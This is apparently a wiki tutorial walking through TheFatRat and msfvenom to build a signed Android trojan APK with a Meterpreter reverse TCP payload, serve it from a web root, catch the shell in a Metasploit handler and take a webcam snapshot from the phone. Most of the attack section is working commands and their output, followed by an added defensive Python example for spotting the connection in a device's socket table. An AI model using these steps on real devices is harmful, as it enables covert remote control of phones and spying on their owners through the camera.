Metasploit Trojan Android FatRat

From xinux.net

TheFatRat

Install

Start

  • ./fatrat


Create Backdoor with msfvenom

  • Create Backdoor with msfvenom
    • SIGNED ANDROID >> FatRat.apk
      • Set LHOST IP: 10.81.1.91
      • Set LPORT: 7771
      • Please enter the base name for output files : carlos
    • android/meterpreter/reverse_tcp

Result

  Generate Backdoor
  +------------++-------------------------++-----------------------+
  | Name       ||  Descript   	          || Your Input
  +------------++-------------------------++-----------------------+
  | LHOST      ||  The Listen Addres      || 10.81.1.91
  | LPORT      ||  The Listen Ports       || 7771
  | OUTPUTNAME ||  The Filename output    || carlos
  | PAYLOAD    ||  Payload To Be Used     || android/meterpreter/reverse_tcp
  +------------++-------------------------++-----------------------+




[ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]
 
[*] Creating RAT payload with msfvenom
[✔] Done!
[*] Creating a Valid Certificate
[✔] Done!
[*] Signing your payload APK
[✔] Done!

 Do you want to create a listener for this configuration
 to use in msfconsole in future ?

Move the APK to the web root

  • mv backdoored/carlos.apk /var/www/html/

Metasploit Console

  • msfconsole
  • msf > use multi/handler
  • msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
PAYLOAD => android/meterpreter/reverse_tcp
  • msf exploit(handler) > set LHOST 10.81.1.91
LHOST => 10.81.1.91
  • msf exploit(handler) > set LPORT 7771
LPORT => 7771
  • msf exploit(handler) > exploit
[*] Exploit running as background job 0. 

[*] Started reverse TCP handler on 10.81.1.91:7771

Connect

msf exploit(handler) > [*] Sending stage (69050 bytes) to 10.81.1.12
[*] Meterpreter session 1 opened (10.81.1.91:7771 -> 10.81.1.12:50464) at 2017-11-11 14:33:18 +0100

Show the sessions

  • msf exploit(handler) > sessions
Active sessions
===============

  Id  Name  Type                        Information          Connection
  --  ----  ----                        -----------          ----------
  1         meterpreter dalvik/android  u0_a101 @ localhost  10.81.1.91:7771 -> 10.81.1.12:50464 (10.81.1.12)

Switch to the session

  • msf exploit(handler) > sessions 1
[*] Starting interaction with 1...

Getting started

  • meterpreter > pwd
/data/user/0/com.metasploit.stage/files
  • meterpreter > webcam_list
1: Back Camera
2: Front Camera

  • meterpreter > webcam_snap 2

[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/zhJgKAww.jpeg
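
For triage on a device, the details visible in the session above (package `com.metasploit.stage`, user `u0_a101`, connection to 10.81.1.91:7771) can be matched against the device's own socket table. The following Python code is an added example, not part of the original page or of TheFatRat or Metasploit. It assumes the output of `pm list packages -U` and the contents of `/proc/net/tcp` have been collected from the device; the sample data is constructed and the function names are hypothetical.

```python
import socket
import struct

SUSPECT_PACKAGES = {"com.metasploit.stage"}  # package name from the pwd output above

# Constructed sample data in the format of `pm list packages -U` and /proc/net/tcp.
PM_LIST = """\
package:com.android.chrome uid:10088
package:com.metasploit.stage uid:10101
"""
PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0C01510A:C520 5B01510A:1E5B 01 00000000:00000000 00:00000000 00000000 10101        0 41234
   1: 0C01510A:A1B2 0E01510A:01BB 01 00000000:00000000 00:00000000 00000000 10088        0 41250
   2: 00000000:1F90 00000000:0000 0A 00000000:00000000 00:00000000 00000000 10088        0 41251
"""

def parse_packages(text):
    """Return {uid: package} from `pm list packages -U` style lines."""
    uids = {}
    for line in text.splitlines():
        fields = dict(f.split(":", 1) for f in line.split() if ":" in f)
        if "package" in fields and "uid" in fields:
            uids[int(fields["uid"])] = fields["package"]
    return uids

def decode_endpoint(hexaddr):
    """Decode '5B01510A:1E5B': IPv4 stored little-endian, port in hex."""
    ip_hex, port_hex = hexaddr.split(":")
    return socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16))), int(port_hex, 16)

def uid_label(uid):
    """Numeric app UID -> the uN_aM form shown in the session list (app UIDs start at 10000)."""
    return f"u{uid // 100000}_a{uid % 100000 - 10000}" if uid % 100000 >= 10000 else str(uid)

def established_connections(proc_net_tcp, packages):
    """List (package, user, remote_ip, remote_port, suspect) for ESTABLISHED sockets."""
    rows = []
    for line in proc_net_tcp.splitlines()[1:]:  # skip the header line
        cols = line.split()
        if len(cols) < 8 or cols[3] != "01":  # state 01 = ESTABLISHED
            continue
        uid = int(cols[7])
        pkg = packages.get(uid, "<unknown>")
        ip, port = decode_endpoint(cols[2])
        rows.append((pkg, uid_label(uid), ip, port, pkg in SUSPECT_PACKAGES))
    return rows

if __name__ == "__main__":
    print(*established_connections(PROC_NET_TCP, parse_packages(PM_LIST)), sep="\n")
```

A name match only identifies a payload that still uses the package name seen above; the UID-to-connection mapping itself applies to any package. IPv6 sockets are listed in `/proc/net/tcp6`, which this example does not parse.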
